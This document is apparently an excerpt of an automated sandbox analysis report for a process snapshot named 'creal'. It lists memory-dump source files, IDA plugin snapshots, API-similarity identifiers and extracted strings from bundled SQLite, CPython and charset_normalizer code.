                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$Err_$Dict_ErrorFromItemLong_Number_ObjectObject_OccurredSsize_tVectorcallWith
                                                                                                                                                                                                                • String ID: bool$feed
                                                                                                                                                                                                                • API String ID: 2189706420-2849697477
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DeallocErr_ItemObject_$Dict_ErrorObjectOccurredVectorcallWith
                                                                                                                                                                                                                • String ID: bool$feed
                                                                                                                                                                                                                • API String ID: 2902451266-2849697477
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$Err_$Dict_ErrorFromItemLong_Number_ObjectObject_OccurredSsize_tVectorcallWith
                                                                                                                                                                                                                • String ID: bool$feed
                                                                                                                                                                                                                • API String ID: 2189706420-2849697477
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DeallocErr_ItemObject_$Dict_ErrorObjectOccurredVectorcallWith
                                                                                                                                                                                                                • String ID: bool$eligible
                                                                                                                                                                                                                • API String ID: 2902451266-3320767611
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpy$memset
                                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$API called with NULL prepared statement$API called with finalized prepared statement$PRAGMA "%w".page_count$misuse
Memory Dump Source
• Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
• Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
Similarity
• API ID: memcpy
• String ID: %!.15g$%02x$%lld$'%.*q'$-- $?$NULL$zeroblob(%d)
Strings
• Cannot add a column with non-constant default, xrefs: 00007FF8E69061AF
• Cannot add a UNIQUE column, xrefs: 00007FF8E69060E3
• Cannot add a PRIMARY KEY column, xrefs: 00007FF8E69060C8
• UPDATE "%w".sqlite_master SET sql = printf('%%.%ds, ',sql) || %Q || substr(sql,1+length(printf('%%.%ds',sql))) WHERE type = 'table' AND name = %Q, xrefs: 00007FF8E690635C
• SELECT CASE WHEN quick_check GLOB 'CHECK*' THEN raise(ABORT,'CHECK constraint failed') ELSE raise(ABORT,'NOT NULL constraint failed') END FROM pragma_quick_check(%Q,%Q) WHERE quick_check GLOB 'CHECK*' OR quick_check GLOB 'NULL*', xrefs: 00007FF8E6906491
• cannot add a STORED column, xrefs: 00007FF8E69062B4
• Cannot add a NOT NULL column with default value NULL, xrefs: 00007FF8E6906155
• SELECT raise(ABORT,%Q) FROM "%w"."%w", xrefs: 00007FF8E690613D, 00007FF8E69061B9, 00007FF8E69062C3
• Cannot add a REFERENCES column with non-NULL default value, xrefs: 00007FF8E6906133
Memory Dump Source
• Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
• Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
Similarity
• API ID: memcpy
• String ID: Cannot add a NOT NULL column with default value NULL$Cannot add a PRIMARY KEY column$Cannot add a REFERENCES column with non-NULL default value$Cannot add a UNIQUE column$Cannot add a column with non-constant default$SELECT CASE WHEN quick_check GLOB 'CHECK*' THEN raise(ABORT,'CHECK constraint failed') ELSE raise(ABORT,'NOT NULL constraint failed') END FROM pragma_quick_check(%Q,%Q) WHERE quick_check GLOB 'CHECK*' OR quick_check GLOB 'NULL*'$SELECT raise(ABORT,%Q) FROM "%w"."%w"$UPDATE "%w".sqlite_master SET sql = printf('%%.%ds, ',sql) || %Q || substr(sql,1+length(printf('%%.%ds',sql))) WHERE type = 'table' AND name = %Q$cannot add a STORED column
Memory Dump Source
• Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
• Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmp
• Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmp
• Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmp
• Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
Similarity
• API ID: Dealloc$Object_State_ThreadTrackTrash_beginTrash_condTrash_endUnchecked
• String ID:
Memory Dump Source
• Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
• Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmp
• Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmp
• Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmp
• Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
Similarity
• API ID: Dealloc$BoolCompareErr_FromLong_Object_OccurredRichSsize_t
• String ID: __init__$charset_normalizer.md.UnprintablePlugin$ratio
Memory Dump Source
• Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
• Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
Similarity
• API ID: new[]
• String ID: %s%c%s$:$:$?$\$winFullPathname1$winFullPathname2
Memory Dump Source
• Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
• Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmp
• Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmp
• Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmp
• Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
Similarity
• API ID: DoubleErr_Float_Occurred$From
• String ID: bool$float$mess_ratio$str
                                                                                                                                                                                                                • API String ID: 627764739-3758540285
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$Object_Vectorcall$Dict_Item
                                                                                                                                                                                                                • String ID: <module>
                                                                                                                                                                                                                • API String ID: 1355803777-217463007
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memset
                                                                                                                                                                                                                • String ID: cannot open %s column for writing$cannot open table without rowid: %s$cannot open view: %s$cannot open virtual table: %s$foreign key$indexed$no such column: "%s"$out of memory
                                                                                                                                                                                                                • API String ID: 2221118986-554953066
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$Object_State_ThreadTrackTrash_beginTrash_condTrash_endUnchecked
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2819143443-0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Err_Unicode_$CharactersCopyFastFormatStringmemcpy
                                                                                                                                                                                                                • String ID: join() result is too long for a Python string$sequence item %zd: expected str instance, %.80s found
                                                                                                                                                                                                                • API String ID: 3966466113-1579438684
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                                                • String ID: %s %T already exists$sqlite_master$sqlite_temp_master$table$temporary table name must be unqualified$there is already an index named %s$view
                                                                                                                                                                                                                • API String ID: 3510742995-2846519077
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$BoolCompareErr_FromLong_Object_OccurredRichSsize_t
                                                                                                                                                                                                                • String ID: ratio
                                                                                                                                                                                                                • API String ID: 2538524772-4234197119
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
• Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmp
• Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmp
• Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmp
• Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
Similarity
• API ID: Dealloc$Object_Vectorcall$Err_FormatMethod
• String ID: bool$eligible
• API String ID: 131476257-3320767611
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
• Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
Similarity
• API ID: memcpy$memset$memmove
• String ID: "%w" $%Q%s
• API String ID: 3094553269-1987291987
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
• Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
Similarity
• API ID: memcpy
• String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$database corruption
• API String ID: 3510742995-3418467682
APIs
Memory Dump Source
• Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
• Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmp
• Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmp
• Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmp
• Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
Similarity
• API ID: Dealloc$Object_State_ThreadTrackTrash_beginTrash_condTrash_endUnchecked
• String ID:
• API String ID: 2819143443-0
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
• Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
Similarity
• API ID: memcpy
• String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$API called with NULL prepared statement$API called with finalized prepared statement$ATTACH x AS %Q$misuse
• API String ID: 3510742995-1033472603
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
• Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmp
• Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmp
• Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmp
• Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
Similarity
• API ID: Dealloc$BoolCompareErr_FromLong_Object_OccurredRichSsize_t
• String ID: ratio
• API String ID: 2538524772-4234197119
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
• Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmp
• Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmp
• Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmp
• Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
Similarity
• API ID: Err_String
• String ID: 'SuspiciousRange' object attribute '_character_count' cannot be deleted$attribute '_character_count' of 'SuspiciousRange' undefined$int
• API String ID: 1450464846-3882440367
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Err_String
                                                                                                                                                                                                                • String ID: 'SuperWeirdWordPlugin' object attribute '_word_count' cannot be deleted$attribute '_word_count' of 'SuperWeirdWordPlugin' undefined$int
                                                                                                                                                                                                                • API String ID: 1450464846-1212817586
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Err_String
                                                                                                                                                                                                                • String ID: 'SuperWeirdWordPlugin' object attribute '_buffer_accent_count' cannot be deleted$attribute '_buffer_accent_count' of 'SuperWeirdWordPlugin' undefined$int
                                                                                                                                                                                                                • API String ID: 1450464846-76466605
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Err_String
                                                                                                                                                                                                                • String ID: 'TooManyAccentuatedPlugin' object attribute '_accentuated_count' cannot be deleted$attribute '_accentuated_count' of 'TooManyAccentuatedPlugin' undefined$int
                                                                                                                                                                                                                • API String ID: 1450464846-3693778415
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • attribute '_successive_upper_lower_count' of 'ArchaicUpperLowerPlugin' undefined, xrefs: 00007FF8E7148488
                                                                                                                                                                                                                • int, xrefs: 00007FF8E7148586
                                                                                                                                                                                                                • 'ArchaicUpperLowerPlugin' object attribute '_successive_upper_lower_count' cannot be deleted, xrefs: 00007FF8E71484FC
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Err_String
                                                                                                                                                                                                                • String ID: 'ArchaicUpperLowerPlugin' object attribute '_successive_upper_lower_count' cannot be deleted$attribute '_successive_upper_lower_count' of 'ArchaicUpperLowerPlugin' undefined$int
                                                                                                                                                                                                                • API String ID: 1450464846-634379450
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Err_String
                                                                                                                                                                                                                • String ID: 'SuperWeirdWordPlugin' object attribute '_bad_character_count' cannot be deleted$attribute '_bad_character_count' of 'SuperWeirdWordPlugin' undefined$int
                                                                                                                                                                                                                • API String ID: 1450464846-2709777744
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Err_String
                                                                                                                                                                                                                • String ID: 'SuperWeirdWordPlugin' object attribute '_foreign_long_count' cannot be deleted$attribute '_foreign_long_count' of 'SuperWeirdWordPlugin' undefined$int
                                                                                                                                                                                                                • API String ID: 1450464846-3135691889
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Err_String
                                                                                                                                                                                                                • String ID: 'ArabicIsolatedFormPlugin' object attribute '_isolated_form_count' cannot be deleted$attribute '_isolated_form_count' of 'ArabicIsolatedFormPlugin' undefined$int
                                                                                                                                                                                                                • API String ID: 1450464846-4047731557
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • 'TooManySymbolOrPunctuationPlugin' object attribute '_punctuation_count' cannot be deleted, xrefs: 00007FF8E7144F3C
                                                                                                                                                                                                                • int, xrefs: 00007FF8E7144FC6
                                                                                                                                                                                                                • attribute '_punctuation_count' of 'TooManySymbolOrPunctuationPlugin' undefined, xrefs: 00007FF8E7144EC8
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
